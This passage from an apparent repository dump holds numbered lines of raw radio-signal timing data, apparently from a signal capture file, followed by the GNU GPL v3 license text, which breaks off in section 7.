-166 129 -264 131 -98 855 -66 435 -68 301 -100 299 -98 589 -98 1057 -132 829 -98 425 -164 695 -66 729 -66 297 -166 1293 -100 201 -166 267 -66 599 -66 199 -100 1193 -98 161 -132 625 -100 761 -66 97 -98 1115 -66 131 -100 497 -100 67 -132 11 | RAW_Data: 231 -230 359 -132 6845 -68 1851 -132 463 -66 495 -66 2209 -98 425 -64 299 -66 1031 -66 99 -132 593 -66 461 -198 495 -264 561 -132 3651 -166 301 -66 133 -66 67 -66 531 -134 665 -66 8829 -100 701 -98 1395 -66 131 -132 99 -68 3821 -66 403 -98 1313 -68 2539 -300 1973 -66 659 -132 427 -132 1581 -66 559 -130 1957 -68 999 -198 131 -166 331 -100 201 -166 395 -66 6365 -68 2509 -100 3183 -66 399 -66 2129 -66 1351 -98 393 -98 1545 -98 857 -66 691 -100 4181 -134 863 -100 365 -66 399 -100 2555 -66 525 -132 1619 -66 2485 -132 797 -66 12991 -98 1911 -66 299 -68 397 -132 267 -264 131 -100 297 -66 997 -134 165 -100 2701 -66 2965 -98 993 -66 495 -98 425 -66 1801 -68 433 -168 667 -100 429 -100 265 -64 4789 -66 3015 -66 231 -196 553 -100 753 -232 1549 -332 1359 -66 131 -68 97 -66 559 -98 231 -296 231 -98 301 -100 959 -100 425 -66 619 -66 167 -66 733 -68 133 -200 725 -66 65 -164 1285 -130 291 -98 2169 -66 559 -66 1091 -166 2821 -100 631 -100 663 -66 329 -132 1385 -98 1291 -100 567 -66 231 -100 233 -102 431 -100 167 -98 295 -100 1019 -98 795 -200 1459 -166 499 -132 99 -66 133 -132 199 -100 261 -98 1287 -200 197 -100 399 -266 1591 -134 365 -166 467 -132 961 -132 963 -168 265 -100 497 -132 435 -100 397 -98 365 -100 1151 -68 331 -132 729 -234 297 -132 331 -134 99 -168 433 -132 133 -198 791 -296 525 -132 333 -166 499 -132 65 -298 661 -134 331 -100 329 -66 365 -68 1425 -166 567 -132 465 -98 863 -198 263 -66 229 -66 589 -100 97 -66 727 -98 429 -166 731 -168 265 -166 531 -100 131 -100 631 -100 531 -100 233 -66 1065 -132 1627 -200 1327 -132 1197 -164 393 -66 993 -66 399 -132 263 -100 299 -68 165 -100 889 -66 227 -132 325 -164 163 -66 1125 -100 1481 -98 165 -132 1697 -132 559 -98 1585 -98 459 -134 1395 -130 757 -98 295 -166 363 -130 2181 -66 299 -132 857 -230 99 -66 1361 -200 563 -166 1089 -132 429 -164 1383 -98 361 -196 329 -232 331 -132 297 -66 131 -234 725 -100 823 -132 357 -134 1625 -100 391 -132 197 -98 427 -200 395 -66 359 -130 723 -98 197 -64 459 -66 65 -66 329 -66 459 -98 1811 -132 99 -98 731 -66 363 -64 131 -130 229 -130 363 -230 1019 -66 431 -66 399 -132 165 -200 367 -198 65 -66 567 -166 165 -196 233 -100 397 -132 929 -98 99 -98 797 -300 165 -66 1125 -66 265 -102 131 -200 1019 -100 1047 -100 197 -132 265 -98 167 -68 267 -100 12 | RAW_Data: 199 -66 501 -66 133 -100 2643 -66 129 -100 1183 -66 363 -100 1643 -98 1123 -66 261 -98 3333 -66 427 -66 4731 -100 1197 -66 1139 -66 695 -298 99 -66 663 -100 597 -66 2243 -66 391 -164 821 -132 1413 -66 1559 -132 2199 -98 619 -66 2303 -232 1443 -66 131 -164 295 -64 885 -100 463 -164 1543 -100 423 -100 2813 -98 395 -132 1483 -66 623 -66 829 -66 3931 -100 65 -66 231 -134 1129 -66 265 -100 563 -98 293 -66 2129 -98 3237 -98 723 -130 1061 -134 863 -100 99 -132 463 -100 495 -100 4089 -166 197 -66 673 -132 165 -66 1961 -100 2519 -68 1117 -66 233 -166 1083 -100 555 -66 329 -64 65 -64 131 -66 1117 -98 359 -130 1027 -68 795 -100 529 -230 735 -66 65 -66 997 -68 1547 -98 165 -66 2775 -100 267 -134 2163 -134 463 -66 1889 -68 599 -164 1025 -66 831 -66 1893 -166 1051 -164 1253 -132 1647 -66 1439 -132 457 -100 1771 -98 431 -100 591 -96 1157 -66 133 -132 1709 -66 1913 -98 4121 -66 525 -98 1317 -66 657 -130 951 -132 723 -166 1955 -100 495 -100 1227 -66 599 -132 99 -100 527 -100 625 -66 1087 -132 295 -100 823 -166 1017 -130 1347 -68 429 -100 365 -66 197 -166 1059 -166 331 -98 1727 -134 733 -132 131 -464 497 -132 397 -98 757 -66 501 -66 891 -132 661 -66 265 -298 297 -102 397 -130 429 -132 527 -98 949 -166 587 -66 431 -98 231 -134 131 -134 727 -66 593 -64 1713 -66 229 -132 195 -100 1161 -100 1087 -66 619 -64 1447 -66 1063 -166 265 -68 829 -166 1195 -100 367 -100 329 -332 393 -102 635 -66 929 -100 1295 -68 263 -132 1265 -66 167 -98 831 -66 605 -66 167 -132 1401 -66 399 -100 529 -134 1337 -132 133 -66 229 -98 291 -98 1113 -164 427 -164 297 -66 331 -200 299 -134 397 -166 1229 -132 197 -100 661 -66 265 -68 65 -66 819 -132 555 -130 595 -164 297 -130 131 -230 495 -132 129 -130 989 -68 1397 -98 601 -66 263 -66 763 -66 231 -98 129 -164 525 -100 461 -100 733 -66 265 -232 731 -100 727 -100 1425 -134 265 -66 297 -100 1093 -66 1815 -196 657 -98 261 -66 1117 -232 1563 -66 267 -132 763 -100 365 -132 229 -66 199 -100 1157 -166 427 -166 427 -66 199 -66 331 -164 231 -166 831 -100 433 -64 263 -198 129 -132 329 -98 391 -66 459 -232 429 -134 399 -66 995 -100 925 -66 197 -100 235 -68 199 -134 829 -100 361 -164 1055 -100 197 -98 521 -132 99 -66 1295 -100 365 -98 167 -68 765 -68 199 -100 399 -132 431 -98 1451 -166 165 -68 265 -66 1631 -134 199 -68 235 -102 13 | RAW_Data: 1027 -98 227 -132 1051 -66 4777 -1990 491 -2004 475 -1006 487 -1968 479 -1994 485 -1988 491 -1012 481 -1018 503 -2006 477 -1000 475 -1032 473 -1014 469 -1046 445 -1016 485 -1014 491 -1008 509 -1998 479 -1988 489 -1018 479 -1978 471 -1042 463 -1012 481 -1020 485 -2004 483 -2006 477 -1980 469 -2006 481 -1978 507 -1014 477 -1010 473 -1990 471 -2004 519 -1012 465 -1010 479 -1014 503 -2010 483 -3980 529 -1982 487 -2008 475 -1022 471 -2002 477 -1968 481 -2014 473 -1006 479 -1020 515 -1968 487 -1010 483 -1010 485 -1018 481 -1018 481 -1008 475 -1016 479 -1024 515 -2000 485 -1972 487 -1020 477 -1974 499 -1010 465 -1012 481 -1014 505 -1978 513 -2006 445 -1998 485 -1996 489 -1968 511 -1004 485 -1010 483 -1982 467 -2006 521 -1010 463 -1010 479 -1016 501 -2000 477 -4012 523 -1974 501 -1962 507 -1000 473 -1990 507 -1972 469 -2004 479 -1018 471 -1012 529 -1978 485 -1014 491 -1008 481 -1018 473 -1008 491 -1010 481 -1020 475 -1010 525 -1980 471 -1996 475 -1016 471 -1962 509 -1014 461 -1008 505 -1012 479 -1972 517 -1994 489 -1968 515 -1966 481 -1990 487 -1018 477 -1014 475 -1992 487 -1996 487 -1028 483 -994 515 -972 503 -1992 517 -3976 541 -1988 459 -2012 477 -1014 489 -1966 481 -2000 487 -1992 459 -1038 479 -1016 511 -1962 503 -1016 467 -1012 477 -1014 501 -1016 463 -1012 479 -1014 503 -1018 511 -1954 499 -1976 513 -1012 461 -2010 479 -1010 461 -1018 503 -980 511 -1972 517 -1996 489 -1966 481 -1996 481 -1984 471 -1020 485 -1022 481 -1998 481 -1986 519 -1016 483 -992 481 -1008 483 -2022 499 -3992 501 -1984 497 -1978 507 -1002 487 -1992 467 -1998 471 -2012 477 -1012 461 -1016 511 -2010 471 -998 513 -1006 487 -1008 483 -984 515 -992 481 -1008 485 -1020 515 -1994 459 -2010 479 -1008 489 -1982 481 -1006 505 -986 483 -1020 479 -1992 515 -1996 475 -1976 507 -1972 469 -1996 507 -978 503 -1022 477 -1972 503 -1980 515 -1004 475 -1012 503 -998 481 -1994 517 -4002 515 -1970 519 -1950 521 -984 489 -1968 511 -1968 483 -2008 485 -1002 475 -1016 503 -2010 487 -1008 479 -1002 469 -1014 495 -1014 481 -1020 473 -1006 493 -1008 507 -1998 483 -1990 489 -1018 477 -1972 471 -1044 463 -1014 479 -1020 485 -1974 517 -1980 507 -1974 485 -1974 507 -1982 499 -976 509 -1014 461 -1994 479 -1992 513 -1006 495 -1006 473 -1032 473 -1988 529 -3990 499 -1972 473 -1998 475 -1018 487 -1974 485 -1986 495 -2000 471 -1010 467 -1048 479 -1994 481 -1032 485 -1004 475 -1018 471 -1016 471 -1016 479 -1016 485 -1014 525 -1978 471 -2004 481 -1020 485 -1970 485 -1018 479 -1018 481 -1010 487 -1978 513 -2000 471 -2010 479 -1970 481 -1980 521 -984 493 -1006 473 -1996 14 | RAW_Data: 479 -2016 493 -1000 481 -1036 485 -1006 483 -1980 509 -4000 535 -1988 461 -1976 511 -1014 461 -2008 477 -1998 483 -1980 471 -998 515 -992 515 -2000 473 -1010 489 -1006 471 -1032 471 -1032 485 -994 481 -1010 485 -1036 483 -2000 489 -1966 481 -1008 507 -1978 491 -1006 473 -1016 487 -1018 485 -2002 509 -1978 479 -1982 503 -1972 487 -1972 485 -1030 471 -1010 505 -1968 473 -2002 509 -1002 507 -1016 483 -992 481 -2000 515 -3988 479 -1984 497 -1978 479 -1012 497 -1978 479 -2008 477 -1978 501 -1014 465 -1010 511 -1998 481 -996 513 -1002 475 -1016 471 -1018 507 -1010 475 -1004 487 -1020 509 -1992 459 -2008 479 -1012 459 -2014 479 -1012 489 -1008 477 -1016 479 -1998 519 -1972 487 -1980 481 -2002 483 -1980 471 -1030 483 -994 481 -1994 481 -1992 519 -1022 475 -1006 491 -1008 481 -1980 511 -3992 539 -1992 459 -1980 511 -1008 471 -1994 491 -1968 511 -1966 483 -1022 479 -1018 511 -1996 471 -1016 469 -1012 477 -1012 503 -1002 481 -1030 485 -1004 473 -1018 503 -1984 495 -1966 503 -1016 501 -1970 473 -1008 493 -1010 479 -1018 487 -1974 519 -1978 507 -1968 501 -1974 479 -1978 511 -1014 477 -1008 471 -1988 493 -1998 505 -1018 479 -1014 477 -1010 487 -146608 133 -134 601 -826 163 -132 99 -196 429 -98 423 -64 197 -164 329 -98 129 -130 853 -98 327 -298 425 -100 993 -166 1415 -66 295 -232 887 -130 293 -162 787 -196 1089 -132 525 -164 729 -134 165 -166 601 -100 663 -100 1131 -132 499 -66 235 -66 433 -166 923 -132 427 -166 193 -98 461 -166 457 -132 263 -164 395 -164 231 -236 563 -100 465 -68 265 -100 265 -66 431 -134 797 -100 2415 -66 937 -166 197 -134 263 -234 595 -198 431 -100 959 -66 297 -66 563 -200 429 -98 2499 -130 659 -230 131 -132 923 -68 1029 -134 1527 -100 1259 -166 297 -202 99 -68 267 -100 861 -100 1381 -100 1653 -100 693 -164 197 -66 885 -66 197 -164 65 -66 229 -64 457 -98 755 -100 399 -102 429 -100 697 -132 859 -100 465 -166 689 -130 97 -134 953 -100 1323 -364 559 -98 231 -134 825 -64 131 -164 327 -492 1481 -98 295 -98 227 -132 689 -100 1257 -264 231 -166 463 -66 165 -100 65 -66 233 -66 201 -166 265 -66 531 -132 1161 -168 1423 -100 261 -64 263 -98 559 -200 99 -332 231 -262 65 -66 327 -66 229 -66 955 -100 265 -100 1361 -132 65 -132 1265 -100 265 -66 165 -66 331 -100 65 -166 401 -100 735 -66 931 -66 661 -134 429 -66 233 -98 1159 -64 131 -100 953 -132 829 -100 1127 -66 233 -68 495 -98 197 -98 857 -100 529 -198 819 -100 261 -130 1057 -168 463 -66 427 -66 15 | RAW_Data: 369 -100 397 -100 2453 -100 165 -68 761 -100 931 -66 99 -98 329 -98 791 -100 589 -262 395 -66 1381 -98 725 -98 3229 -100 1791 -100 797 -68 1357 -98 3223 -130 2679 -98 1689 -66 131 -98 1381 -132 989 -96 97 -98 1793 -134 8941 -134 2425 -100 927 -168 733 -66 4789 -100 197 -166 233 -100 231 -66 1223 -132 291 -200 199 -66 1383 -66 2353 -66 3619 -100 1723 -66 1459 -68 199 -68 833 -164 631 -66 165 -66 595 -132 6301 -232 231 -132 167 -168 2159 -98 1321 -98 891 -234 9931 -100 1591 -166 431 -166 1151 -130 2307 -198 623 -66 197 -66 1261 -66 3489 -100 865 -100 995 -100 963 -134 4173 -66 65 -68 297 -66 1257 -66 2313 -132 1121 -198 1747 -166 663 -98 595 -98 1957 -198 663 -132 495 -330 663 -100 1163 -100 233 -200 701 -134 569 -230 393 -64 991 -66 199 -100 1027 -164 1843 -198 851 -100 691 -98 527 -66 1609 -66 755 -68 495 -66 333 -66 2643 -64 785 -130 1177 -66 629 -132 461 -98 689 -98 359 -98 133 -66 2269 -132 1023 -132 163 -166 623 -64 229 -100 227 -66 621 -132 657 -100 429 -100 563 -68 1581 -66 3357 -66 2313 -66 8321 -134 2393 -330 265 -66 1063 -66 199 -166 301 -168 431 -132 461 -100 1673 -66 657 -166 361 -66 561 -66 1597 -66 231 -134 267 -166 563 -66 665 -264 1023 -100 431 -202 401 -66 1529 -66 199 -132 765 -66 1195 -100 297 -98 233 -166 397 -134 267 -198 1193 -100 761 -132 861 -66 297 -268 1127 -98 963 -66 233 -100 267 -66 629 -98 163 -64 261 -196 825 -98 491 -100 1123 -66 301 -134 2223 -132 231 -68 461 -98 565 -66 761 -266 267 -66 201 -100 1063 -134 593 -200 397 -134 795 -102 167 -200 2043 -66 467 -166 229 -166 1199 -200 233 -100 565 -200 525 -66 1657 -132 731 -132 1929 -68 599 -132 361 -66 693 -100 821 -466 65 -98 395 -66 361 -98 395 -66 465 -132 1415 -166 533 -66 1821 -100 365 -100 763 -100 1593 -132 1333 -98 459 -132 3225 -98 361 -100 233 -168 1299 -166 399 -132 493 -66 399 -200 131 -232 1195 -134 731 -98 267 -168 827 -98 1409 -164 623 -98 325 -266 623 -98 99 -98 263 -166 791 -98 991 -66 565 -100 1031 -100 363 -98 133 -98 1589 -102 497 -132 97 -66 397 -100 461 -66 327 -230 985 -196 295 -164 293 -66 2177 -66 361 -98 195 -98 3709 -132 229 -132 1193 -166 1277 -298 331 -100 233 -66 233 -166 659 -66 987 -164 523 -132 327 -66 331 -98 261 -64 459 -98 789 -132 1121 -66 689 -66 399 -134 663 -132 633 -100 365 -66 767 -66 1891 -98 953 -130 16 | RAW_Data: 297 -132 1185 -98 6017 -100 1093 -68 795 -66 99 -66 1847 -68 559 -132 3527 -132 1101 -164 195 -100 163 -66 427 -100 1119 -130 8319 -132 1559 -66 1117 -66 2467 -66 1511 -66 765 -68 333 -100 1887 -166 1991 -66 497 -68 333 -132 165 -134 927 -300 657 -130 2337 -100 1059 -66 799 -198 457 -66 427 -132 2033 -100 923 -66 1197 -100 759 -134 1561 -66 2161 -66 299 -134 1083 -64 527 -66 1155 -98 759 -132 265 -98 425 -100 3029 -66 1185 -98 1245 -66 1149 -100 1225 -166 133 -166 627 -100 165 -168 863 -100 397 -102 1235 -98 5059 -132 99 -68 1593 -66 261 -66 923 -66 2911 -66 2975 -66 2397 -100 263 -132 1253 -166 699 -232 1991 -132 299 -68 1589 -98 233 -100 3665 -66 4049 -100 2539 -100 453 -98 1875 -196 595 -132 799 -68 229 -66 229 -134 559 -132 1909 -166 2665 -132 333 -66 261 -134 531 -134 3959 -66 463 -132 1649 -66 995 -100 1789 -66 2825 -98 97 -228 1251 -132 491 -198 163 -228 263 -164 227 -130 985 -66 457 -98 427 -64 129 -98 99 -64 231 -98 787 -198 399 -198 299 -100 99 -66 163 -196 465 -100 927 -132 457 -264 261 -100 261 -130 1477 -66 163 -132 261 -100 525 -132 265 -102 299 -100 369 -100 861 -98 195 -66 2067 -132 1379 -64 397 -232 65 -98 463 -66 499 -100 165 -132 331 -64 399 -166 361 -98 429 -66 163 -98 1907 -66 229 -100 531 -166 459 -100 761 -134 133 -98 1061 -68 563 -166 1343 -98 65 -130 331 -168 365 -98 855 -66 499 -100 1265 -66 1327 -98 431 -100 1915 -132 1247 -98 99 -100 363 -66 1085 -64 1451 -66 129 -98 229 -132 889 -98 1181 -66 231 -230 295 -98 989 -168 995 -66 231 -68 99 -100 431 -100 231 -134 1629 -100 65 -66 395 -66 331 -100 199 -68 765 -98 723 -98 521 -166 329 -98 299 -68 299 -100 965 -68 431 -66 365 -134 131 -300 1717 -98 427 -98 589 -64 493 -100 429 -66 267 -134 131 -168 67 -66 465 -66 463 -100 1257 -132 267 -166 165 -132 829 -132 495 -130 393 -100 1727 -66 923 -66 2611 -66 2425 -100 133 -100 2251 -66 331 -68 1393 -136 4379 -166 3413 -298 1255 -134 365 -132 567 -264 761 -98 163 -98 921 -66 529 -66 593 -68 163 -98 949 -66 361 -66 165 -100 295 -130 457 -66 295 -198 1595 -66 1791 -164 563 -100 265 -100 591 -98 917 -100 2829 -68 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by 